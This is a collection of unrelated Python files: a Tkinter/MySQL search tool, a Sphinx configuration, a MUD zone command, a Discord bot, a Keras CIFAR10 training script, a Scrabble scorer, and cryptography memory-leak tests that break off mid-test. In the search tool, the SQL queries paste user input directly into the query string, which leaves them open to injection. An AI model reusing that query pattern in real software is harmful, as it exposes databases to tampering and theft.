CARPLA1 = "%" + CARPLA1 + "%"
self.select_sql2(NAME1, USRE1, PASS1, SQLNAME1, TABLENAME1, CARPLA1)
def clean(self):
self.s1.set("")
self.s2.set("")
self.s3.set("")
self.s4.set("")
self.s5.set("")
self.s6.set("")
self.t.delete(1.0, END)
def select_sql(self, NAME, USRE, PASS, SQLNAME, TABLENAME):
# Open the database connection. Keyword arguments are used because
# pymysql.connect() no longer accepts positional arguments in newer releases.
try:
db = pymysql.connect(host=NAME, user=USRE, password=PASS, database=SQLNAME)
except:
print("数据库连接失败")
self.t.insert('1.0', "数据库连接失败")
return
# Use cursor() to get a cursor for executing queries
cursor = db.cursor()
# SQL query statement
sql = "SELECT * FROM %s" % (TABLENAME)
# print(sql)
try:
# Execute the SQL statement
cursor.execute(sql)
# Fetch all result rows
results = cursor.fetchall()
for row in results:
row2 = str(row) + "\n"
self.t.insert('1.0', row2)
self.t.insert('1.0', "-----------------------------"
"------------------------------"
"------------------------------"
"--------\n")
# print(row)
# print(results)
except:
return 0
# Close the database connection
db.close()
def select_sql2(self, NAME, USRE, PASS, SQLNAME, TABLENAME, CARPLA):
# Open the database connection (keyword arguments, as above)
try:
db = pymysql.connect(host=NAME, user=USRE, password=PASS, database=SQLNAME)
except:
print("数据库连接失败")
self.t.insert('1.0', "数据库连接失败")
return
# Use cursor() to get a cursor for executing queries
cursor = db.cursor()
# SQL query statement
sql = "SELECT * FROM %s WHERE TEXT1 like ('%s') or TEXT2 like ('%s') " \
"or API like ('%s') or COLOR1 like ('%s') or COLOR2 like ('%s')" \
% (TABLENAME, CARPLA, CARPLA, CARPLA, CARPLA, CARPLA)
# print(sql)
try:
# Execute the SQL statement
cursor.execute(sql)
# Fetch all result rows
results = cursor.fetchall()
for row in results:
row2 = str(row) + "\n"
self.t.insert('1.0', row2)
self.t.insert('1.0', "-----------------------------"
"------------------------------"
"------------------------------"
"--------\n")
# print(row)
# print(results)
except:
return 0
# Close the database connection
db.close()
def center_window(self):
screenwidth = search.winfo_screenwidth()
screenheight = search.winfo_screenheight()
search.update()
width = search.winfo_width()
height = search.winfo_height()
size = '+%d+%d' % ((screenwidth - width)/2, (screenheight - height)/2)
search.geometry(size)
def close_window():
print("search destroy")
search.destroy()
if __name__ == '__main__':
search = tk.Tk()
search2 = Search(search)
# On window close, print a message and destroy the window
search.protocol('WM_DELETE_WINDOW', close_window)
# Enter the main event loop
search.mainloop()
|
#
# needs test docs documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 28 11:37:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../../sphinxcontrib"))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinxcontrib.needs", "sphinxcontrib.plantuml"]
needs_types = [
{"directive": "story", "title": "User Story", "prefix": "US_", "color": "#BFD8D2", "style": "node"},
{"directive": "spec", "title": "Specification", "prefix": "SP_", "color": "#FEDCD2", "style": "node"},
{"directive": "impl", "title": "Implementation", "prefix": "IM_", "color": "#DF744A", "style": "node"},
{"directive": "test", "title": "Test Case", "prefix": "TC_", "color": "#DCB239", "style": "node"},
]
needs_extra_links = [
{
"option": "links",
"incoming": "is linked by",
"outgoing": "links to",
"copy": False,
"style": "#black",
"style_part": "dotted,#black",
},
{
"option": "blocks",
"incoming": "is blocked by",
"outgoing": "blocks",
"copy": True,
"style": "bold,#AA0000",
},
{
"option": "tests",
"incoming": "is tested by",
"outgoing": "tests",
"copy": False,
"style": "dashed,#00AA00",
"style_part": "dotted,#00AA00",
},
]
needs_flow_link_types = ["links", "tests"]
plantuml = "java -jar %s" % os.path.join(os.path.dirname(__file__), "..", "utils", "plantuml.jar")
plantuml_output_format = "svg"
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "needs test docs"
copyright = "2017, team useblocks"
author = "team useblocks"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "1.0"
# The full version, including alpha/beta/rc tags.
release = "1.0"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "needstestdocsdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "needstestdocs.tex", "needs test docs Documentation", "team useblocks", "manual"),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "needstestdocs", "needs test docs Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"needstestdocs",
"needs test docs Documentation",
author,
"needstestdocs",
"One line description of project.",
"Miscellaneous",
),
]
|
"""
cmdZedit.py
Author: Fletcher Haynes
This command allows editing of room attributes.
"""
import MudCommand
import MudWorld
import string
import os
class cmdZedit(MudCommand.MudCommand):
def __init__(self):
MudCommand.MudCommand.__init__(self)
self.info['cmdName'] = "zedit"
self.info['helpText'] = '''Lets you edit the zone attributes.'''
self.info['useExample'] = '''zedit (addlogic, dellogic)'''
def process(self, player, args=''):
# Let's split the args up. We only want to split it once, as the
# parameter will always be one word, whereas the value might be
# more than one. Such as: Zedit name Room of Superdeath.
argList = args.split(" ", 1)
# We always want 2 pieces of text. If there is only one, then
# they didn't include a value.
if len(argList) != 2:
player.writeWithPrompt("Proper format is: zedit field value.")
return
# Let's get the zone reference...
# TODO: Do we want to allow them to edit zone names? That will require
# deleting the old file, and rewriting the zone index. Not too hard,
# but I am not sure I want to allow that. It might be safer to force
# them to use delzone?
z = player.getZoneRef()
if argList[0].lower() == 'addlogic':
try:
name, logic = MudWorld.world.logicDb.getLogic(argList[1])
z.addLogic(name, logic)
player.writeWithPrompt("Logic module added to zone.")
return
except:
player.writeWithPrompt("That logic module is not attached to this zone.")
return
elif argList[0].lower() == 'dellogic':
try:
z.removeLogic(argList[1])
player.writeWithPrompt("Logic module removed from zone.")
except KeyError:
player.writeWithPrompt("That logic module is not attached to this zone.")
return
else:
player.writeWithPrompt("That is not a valid field to edit.")
return
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `revisiondict` package."""
import sys
from revisiondict import RevisionDict
if sys.version_info[0] < 3:
from test import util_mapping_py2 as util_mapping
else:
from test import util_mapping_py3 as util_mapping
class RevisionDictMappingTest(util_mapping.TestMappingProtocol):
# test compatibility with MappingProtocol
type2test = RevisionDict
|
import os
import urllib.request
# PREWORK
#DICTIONARY = os.path.join('/tmp', 'dictionary.txt')
#urllib.request.urlretrieve('http://bit.ly/2iQ3dlZ', DICTIONARY)
DICTIONARY = '../../day020/bite_065_Get_all_valid_dictionary_words_for_a_draw_of_letters/dictionary.txt'
scrabble_scores = [(1, "E A O I N R T L S U"), (2, "D G"), (3, "B C M P"),
(4, "F H V W Y"), (5, "K"), (8, "J X"), (10, "Q Z")]
LETTER_SCORES = {letter: score for score, letters in scrabble_scores
for letter in letters.split()}
# start coding
def load_words():
"""load the words dictionary (DICTIONARY constant) into a list and return it"""
with open(DICTIONARY) as f:
return [word.strip() for word in f.read().split()]
def calc_word_value(word):
"""given a word calculate its value using LETTER_SCORES"""
word_value = 0
for letter in word:
word_value += LETTER_SCORES[letter.upper()]
return word_value
def max_word_value(words=None):
"""given a list of words return the word with the maximum word value"""
max_word_value = 0
max_word = ''
for word in words:
word_value = calc_word_value(word)
if word_value > max_word_value:
max_word_value = word_value
max_word = word
return max_word
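# A minimal usage sketch (assumes the DICTIONARY path above exists locally); it
# simply ties the three helpers together.
if __name__ == '__main__':
    words = load_words()
    print('loaded', len(words), 'words')
    best = max_word_value(words)
    print('highest scoring word:', best, '=', calc_word_value(best))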
|
from colorama import Fore
from config import token, prefix, dev_mode
from helpers import print, parse, get_server_actions
import actions
import actions.readme
import actions.settings
import actions.propose_command
import discord
import math
if dev_mode:
import importlib
client = discord.Client()
@client.event
async def on_guild_join(guild):
print("Joined guild", guild)
@client.event
async def on_guild_update(old_guild, new_guild):
print("Guild was updated", old_guild, "=>", new_guild)
@client.event
async def on_guild_remove(guild):
print("Left guild", guild)
@client.event
async def on_member_ban(guild, user):
print("Guild", guild, "banned", user)
@client.event
async def on_message(message: discord.Message):
if message.author == client.user:
return
if not message.content.startswith(prefix) or len(message.content) < 1:
return
command, channel, params, mentions, author = parse(message)
if dev_mode:
importlib.reload(actions)
if command in get_server_actions(channel.guild.id)[0].keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing Server Command {command} {author.name}#{author.discriminator}: \"{message.content}\"")
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await get_server_actions(channel.guild.id)[0][command].execute(message)
elif command in actions.command_actions.keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing {command} {author.name}#{author.discriminator}: \"{message.content}\"")
if command in actions.readme.commands:
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Sending readme ({len(actions.actions)} actions)")
inline = True
if len(params) != 0:
if params[0] == '0' or params[0] == 'short':
inline = True
elif params[0] == '1' or params[0] == 'long':
inline = False
embed = discord.Embed()
embed.title = f"Liste der Befehle 1/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
page_itr = 1
for action in actions.actions:
cmd_append = ""
if 'readme' in action.commands:
cmd_append = " [Optional: Stil 0 (Default) / 1]"
elif action.requires_mention:
cmd_append = " [Person]"
elif action.accepts_mention:
cmd_append = " [Optional: Person]"
joined_commands = ' / '.join(action.commands)
joined_commands = (joined_commands[:50] + '..') if len(joined_commands) > 75 else joined_commands
embed.add_field(name='**' + joined_commands + cmd_append + '**', value=action.description, inline=inline)
itr += 1
if itr == 24:
page_itr += 1
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
embed = discord.Embed()
embed.title = f"Liste der Befehle {page_itr}/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
if len(embed.fields) != 0:
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
elif command in actions.settings.commands:
print("Sending settings:", params)
if len(params) > 0:
pass
else:
await channel.send("Coming soon™")
# embed = discord.Embed()
# embed.title = "Mögliche Einstellungen"
# embed.description = 'Prefix: ' + prefix + 'settings [Einstellung]'
# for setting_name in actions.settings.settings:
# embed.add_field(name='**' + ' / '.join(setting_name) + '**', value=actions.settings.settings[setting_name])
# await channel.send(embed=embed)
elif command in actions.propose_command.commands:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message, client)
else:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message)
@client.event
async def on_ready():
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Started")
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Name:", client.user.name)
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Id:", client.user.id)
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Current guilds (max 25):", [x["name"] for x in await client.fetch_guilds().get_guilds(25)])
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name='+help'))
client.run(token)
|
"""
Trains a VGG network (VGG16 or VGG19, selected via args_model) on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 64
args_lr = 0.0008
args_model = 'vgg16'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_final4_3level/' + job_name + '*'
total_epochs = 49
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
if epoch_waste_time > 0:
send_signal.send(args.node, 10002, message)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_final4_3level/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
message = job_name + ' checkpoint'
send_signal.send(args.node, 10002, message)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch, first_epoch_start
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
if epoch == starting_epoch and args.resume:
first_epoch_start = time.time()
message = job_name + ' d_end'
send_signal.send(args.node, 10002, message)
elif epoch == starting_epoch:
first_epoch_start = time.time()
if epoch == starting_epoch:
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
def on_epoch_end(self, epoch, logs=None):
if epoch == starting_epoch:
first_epoch_time = int(time.time() - first_epoch_start)
message = job_name + ' 1st_epoch ' + str(first_epoch_time)
send_signal.send(args.node, 10002, message)
progress = round((epoch+1) / round(total_epochs/2), 2)
message = job_name + ' completion ' + str(progress)
send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import json
import os
import subprocess
import sys
import textwrap
import pytest
from cryptography.hazmat.bindings.openssl.binding import Binding
MEMORY_LEAK_SCRIPT = """
import sys
def main(argv):
import gc
import json
import cffi
from cryptography.hazmat.bindings._openssl import ffi, lib
heap = {}
BACKTRACE_ENABLED = False
if BACKTRACE_ENABLED:
backtrace_ffi = cffi.FFI()
backtrace_ffi.cdef('''
int backtrace(void **, int);
char **backtrace_symbols(void *const *, int);
''')
backtrace_lib = backtrace_ffi.dlopen(None)
def backtrace():
buf = backtrace_ffi.new("void*[]", 24)
length = backtrace_lib.backtrace(buf, len(buf))
return (buf, length)
def symbolize_backtrace(trace):
(buf, length) = trace
symbols = backtrace_lib.backtrace_symbols(buf, length)
stack = [
backtrace_ffi.string(symbols[i]).decode()
for i in range(length)
]
lib.Cryptography_free_wrapper(symbols, backtrace_ffi.NULL, 0)
return stack
else:
def backtrace():
return None
def symbolize_backtrace(trace):
return None
@ffi.callback("void *(size_t, const char *, int)")
def malloc(size, path, line):
ptr = lib.Cryptography_malloc_wrapper(size, path, line)
heap[ptr] = (size, path, line, backtrace())
return ptr
@ffi.callback("void *(void *, size_t, const char *, int)")
def realloc(ptr, size, path, line):
if ptr != ffi.NULL:
del heap[ptr]
new_ptr = lib.Cryptography_realloc_wrapper(ptr, size, path, line)
heap[new_ptr] = (size, path, line, backtrace())
return new_ptr
@ffi.callback("void(void *, const char *, int)")
def free(ptr, path, line):
if ptr != ffi.NULL:
del heap[ptr]
lib.Cryptography_free_wrapper(ptr, path, line)
result = lib.Cryptography_CRYPTO_set_mem_functions(malloc, realloc, free)
assert result == 1
# Trigger a bunch of initialization stuff.
from cryptography.hazmat.backends.openssl.backend import backend
start_heap = set(heap)
func(*argv[1:])
gc.collect()
gc.collect()
gc.collect()
if lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:
lib.OSSL_PROVIDER_unload(backend._binding._legacy_provider)
lib.OSSL_PROVIDER_unload(backend._binding._default_provider)
if lib.Cryptography_HAS_OPENSSL_CLEANUP:
lib.OPENSSL_cleanup()
# Swap back to the original functions so that if OpenSSL tries to free
# something from its atexit handle it won't be going through a Python
# function, which will be deallocated when this function returns
result = lib.Cryptography_CRYPTO_set_mem_functions(
ffi.addressof(lib, "Cryptography_malloc_wrapper"),
ffi.addressof(lib, "Cryptography_realloc_wrapper"),
ffi.addressof(lib, "Cryptography_free_wrapper"),
)
assert result == 1
remaining = set(heap) - start_heap
if remaining:
sys.stdout.write(json.dumps(dict(
(int(ffi.cast("size_t", ptr)), {
"size": heap[ptr][0],
"path": ffi.string(heap[ptr][1]).decode(),
"line": heap[ptr][2],
"backtrace": symbolize_backtrace(heap[ptr][3]),
})
for ptr in remaining
)))
sys.stdout.flush()
sys.exit(255)
main(sys.argv)
"""
def assert_no_memory_leaks(s, argv=[]):
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
# When using pytest-cov it attempts to instrument subprocesses. This
# causes the memleak tests to raise exceptions.
# we don't need coverage so we remove the env vars.
env.pop("COV_CORE_CONFIG", None)
env.pop("COV_CORE_DATAFILE", None)
env.pop("COV_CORE_SOURCE", None)
argv = [
sys.executable,
"-c",
"{}\n\n{}".format(s, MEMORY_LEAK_SCRIPT),
] + argv
# Shell out to a fresh Python process because OpenSSL does not allow you to
# install new memory hooks after the first malloc/free occurs.
proc = subprocess.Popen(
argv,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
assert proc.stdout is not None
assert proc.stderr is not None
try:
proc.wait()
if proc.returncode == 255:
# 255 means there was a leak, load the info about what mallocs
# weren't freed.
out = json.loads(proc.stdout.read().decode())
raise AssertionError(out)
elif proc.returncode != 0:
# Any exception type will do to be honest
raise ValueError(proc.stdout.read(), proc.stderr.read())
finally:
proc.stdout.close()
proc.stderr.close()
def skip_if_memtesting_not_supported():
return pytest.mark.skipif(
not Binding().lib.Cryptography_HAS_MEM_FUNCTIONS,
reason="Requires OpenSSL memory functions (>=1.1.0)",
)
@pytest.mark.skip_fips(reason="FIPS self-test sets allow_customize = 0")
@skip_if_memtesting_not_supported()
class TestAssertNoMemoryLeaks(object):
def test_no_leak_no_malloc(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
pass
"""
)
)
def test_no_leak_free(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.bindings.openssl.binding import Binding
b = Binding()
name = b.lib.X509_NAME_new()
b.lib.X509_NAME_free(name)
"""
)
)
def test_no_leak_gc(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.bindings.openssl.binding import Binding
b = Binding()
name = b.lib.X509_NAME_new()
b.ffi.gc(name, b.lib.X509_NAME_free)
"""
)
)
def test_leak(self):
with pytest.raises(AssertionError):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.bindings.openssl.binding import (
Binding
)
b = Binding()
b.lib.X509_NAME_new()
"""
)
)
def test_errors(self):
with pytest.raises(ValueError):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
raise ZeroDivisionError
"""
)
)
@pytest.mark.skip_fips(reason="FIPS self-test sets allow_customize = 0")
@skip_if_memtesting_not_supported()
class TestOpenSSLMemoryLeaks(object):
@pytest.mark.parametrize(
"path", ["x509/PKITS_data/certs/ValidcRLIssuerTest28EE.crt"]
)
def test_der_x509_certificate_extensions(self, path):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func(path):
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
import cryptography_vectors
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_der_x509_certificate(
f.read(), backend
)
cert.extensions
"""
),
[path],
)
@pytest.mark.parametrize("path", ["x509/cryptography.io.pem"])
def test_pem_x509_certificate_extensions(self, path):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func(path):
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
import cryptography_vectors
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_pem_x509_certificate(
f.read(), backend
)
cert.extensions
"""
),
[path],
)
def test_x509_csr_extensions(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
private_key = rsa.generate_private_key(
key_size=2048, public_exponent=65537, backend=backend
)
cert = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([])
).add_extension(
x509.OCSPNoCheck(), critical=False
).sign(private_key, hashes.SHA256(), backend)
cert.extensions
"""
)
)
def test_ec_private_numbers_private_key(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives.asymmetric import ec
ec.EllipticCurvePrivateNumbers(
private_value=int(
'280814107134858470598753916394807521398239633534281633982576099083'
'35787109896602102090002196616273211495718603965098'
),
public_numbers=ec.EllipticCurvePublicNumbers(
curve=ec.SECP384R1(),
x=int(
'10036914308591746758780165503819213553101287571902957054148542'
'504671046744460374996612408381962208627004841444205030'
),
y=int(
'17337335659928075994560513699823544906448896792102247714689323'
'575406618073069185107088229463828921069465902299522926'
)
)
).private_key(backend)
"""
)
)
def test_ec_derive_private_key(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives.asymmetric import ec
ec.derive_private_key(1, ec.SECP256R1(), backend)
"""
)
)
def test_x25519_pubkey_from_private_key(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.primitives.asymmetric import x25519
private_key = x25519.X25519PrivateKey.generate()
private_key.public_key()
"""
)
)
def test_create_ocsp_request(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.x509 import ocsp
import cryptography_vectors
path = "x509/PKITS_data/certs/ValidcRLIssuerTest28EE.crt"
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_der_x509_certificate(
f.read(), backend
)
builder = ocsp.OCSPRequestBuilder()
builder = builder.add_certificate(
cert, cert, hashes.SHA1()
).add_extension(x509.OCSPNonce(b"0000"), False)
req = builder.build()
"""
)
)
@pytest.mark.parametrize(
"path",
["pkcs12/cert-aes256cbc-no-key.p12", "pkcs12/cert-key-aes256cbc.p12"],
)
def test_load_pkcs12_key_and_certificates(self, path):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func(path):
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives.serialization import pkcs12
import cryptography_vectors
with cryptography_vectors.open_vector_file(path, "rb") as f:
pkcs12.load_key_and_certificates(
f.read(), b"cryptography", backend
)
"""
),
[path],
)
def test_create_crl_with_idp(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
import datetime
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import NameOID
key = ec.generate_private_key(ec.SECP256R1(), backend)
last_update = datetime.datetime(2002, 1, 1, 12, 1)
next_update = datetime.datetime(2030, 1, 1, 12, 1)
idp = x509.IssuingDistributionPoint(
full_name=None,
